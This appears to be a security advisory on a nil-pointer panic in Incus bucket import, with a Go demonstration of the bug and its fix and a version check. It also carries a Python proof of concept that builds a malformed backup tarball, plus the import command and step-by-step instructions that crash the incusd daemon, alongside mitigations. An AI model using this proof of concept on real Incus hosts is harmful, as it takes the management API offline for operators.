The vulnerability stems from a missing nil-pointer check in the storage bucket import logic. An authenticated attacker can supply a crafted backup archive whose `index.yaml` omits the `config` block. The vulnerable function `CreateBucketFromBackup` in `backend.go` goes on to evaluate `srcBackup.Config.Bucket` without verifying that `srcBackup.Config` is non-nil. Because the YAML unmarshaler leaves the absent field as a nil pointer (the Go zero value for a pointer), the dereference triggers a Go runtime panic.

The panic halts the `incusd` daemon, resulting in a Denial of Service (DoS). The crash does not affect running workloads, but it makes the control-plane API unavailable. The attack requires an authenticated user with permission to import storage buckets; a malformed archive with a specially crafted `index.yaml` is enough to force the crash.

The issue is present in Incus versions prior to 6.23.0. The vulnerable code path is located in `internal/server/storage/backend.go` at line 7754. The fix is to validate that `srcBackup.Config` is not nil before accessing its members, returning an error instead of panicking.
Platform: Incus Container Manager
Version: Pre-6.23.0
Vulnerability: Unchecked nil pointer
Severity: High
Date: 2026-03-26
Prediction: Fixed 2026-03-27 (v6.23.0)
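The failure mode described above, as an added example that is not Incus's own code: hypothetical stand-in types with the same `Config` pointer shape, the unchecked `Config.Bucket` dereference beside the nil-checked form that the fix calls for, and a recover-based probe so the panic can be observed without killing the process. The standard-library JSON decoder is used in place of the YAML decoder Incus uses; both leave an absent block as a nil pointer. The type names, function names and sample documents are assumptions made for this example.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// Hypothetical stand-ins for the backup index types. The field chain mirrors
// the page's description (srcBackup.Config.Bucket); these are not Incus's real
// types. encoding/json is used in place of the YAML decoder Incus uses: both
// leave a pointer field nil when the corresponding block is absent.
type BucketConfig struct {
	Bucket map[string]string `json:"bucket"`
}

type BackupIndex struct {
	Name   string        `json:"name"`
	Config *BucketConfig `json:"config"` // nil when the "config" block is missing
}

// DecodeIndex parses a backup index document.
func DecodeIndex(raw []byte) (*BackupIndex, error) {
	var idx BackupIndex
	if err := json.Unmarshal(raw, &idx); err != nil {
		return nil, err
	}
	return &idx, nil
}

// vulnerableBucketConfig reproduces the unchecked dereference: it reads
// Config.Bucket without checking Config, so a missing block panics.
func vulnerableBucketConfig(idx *BackupIndex) map[string]string {
	return idx.Config.Bucket
}

// VulnerablePanics decodes raw and reports whether the unchecked access
// panics. In the real daemon this panic is what takes incusd down; here it
// is recovered so the outcome can be observed and returned.
func VulnerablePanics(raw []byte) (panicked bool) {
	idx, err := DecodeIndex(raw)
	if err != nil {
		return false
	}
	defer func() {
		if r := recover(); r != nil {
			panicked = true
		}
	}()
	_ = vulnerableBucketConfig(idx)
	return false
}

// HardenedImport is the corrected form: it validates the pointer and returns
// an error for a malformed index instead of panicking.
func HardenedImport(raw []byte) (map[string]string, error) {
	idx, err := DecodeIndex(raw)
	if err != nil {
		return nil, err
	}
	if idx.Config == nil {
		return nil, errors.New("backup index is missing the config block")
	}
	return idx.Config.Bucket, nil
}

func main() {
	// Constructed sample inputs: a crafted index carrying only "name", and a
	// well-formed one that carries the config block.
	crafted := []byte(`{"name": "dos-trigger"}`)
	wellFormed := []byte(`{"name": "ok", "config": {"bucket": {"size": "1GiB"}}}`)

	for _, raw := range [][]byte{crafted, wellFormed} {
		fmt.Printf("input %s\n", raw)
		fmt.Printf("  unchecked access panics: %v\n", VulnerablePanics(raw))
		cfg, err := HardenedImport(raw)
		fmt.Printf("  hardened import: cfg=%v err=%v\n", cfg, err)
	}
}
```

Running it with `go run` shows the crafted document panicking under the unchecked access and being rejected with an error by the hardened path, while the well-formed document passes both. The single `idx.Config == nil` test is the whole of the fix: the import request fails with an error returned to the caller rather than the process exiting.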
What Undercode Say:
Check if running a vulnerable version (a plain grep for "6.23." would misreport 6.24 and later as vulnerable, so compare against the fixed release with sort -V)
ver=$(incus version | awk -F': ' '/^Server version/ {print $2}')  # assumes incus prints a "Server version: X.Y.Z" line
[ "$(printf '%s\n' "$ver" 6.23.0 | sort -V | head -n1)" = 6.23.0 ] && echo "patched: $ver" || echo "vulnerable: $ver"
Create malicious bucket backup using Python
cat <<EOF > poc_bucket_nil.py
import io
import tarfile

# index.yaml carrying only the name field: the config block is deliberately omitted
index_content = b"name: dos-trigger\n"
with tarfile.open("nil_panic.tar.gz", "w:gz") as tar:
    # single member at the path the importer reads the index from
    info = tarfile.TarInfo(name="backup/index.yaml")
    info.size = len(index_content)
    tar.addfile(info, io.BytesIO(index_content))
print("[+] Nil-Pointer PoC Tarball created: nil_panic.tar.gz")
EOF
python3 poc_bucket_nil.py
Trigger the DoS (requires valid storage pool and bucket permissions)
incus storage bucket import local-pool nil_panic.tar.gz crash-test
Verify the crash using journalctl
journalctl -u incus --since "1 minute ago" | grep -E "panic|nil pointer dereference"
Exploit:
1. Generate a tarball containing a single `backup/index.yaml` file with only the `name` field, omitting the `config` block.
2. Authenticate to Incus as a user with storage bucket import privileges.
3. Execute `incus storage bucket import <pool> <tarball> <bucket-name>`.
4. The daemon will panic and terminate.
5. Repeated exploitation keeps the API server offline.
Protection from this CVE
- Upgrade to Incus version 6.23.0 or later, which includes the nil-pointer check.
- If immediate upgrade is not possible, restrict storage bucket import permissions to trusted administrators only.
- Monitor `incusd` logs for unexpected crashes or panics related to bucket import failures.
Impact
Denial of Service (DoS) of the Incus control plane. The API server becomes unavailable, preventing container and virtual machine management. Running workloads remain unaffected. An authenticated attacker holding only storage bucket import permission can disrupt operations repeatedly. No data leakage or privilege escalation occurs.
Sources:
Reported By: github.com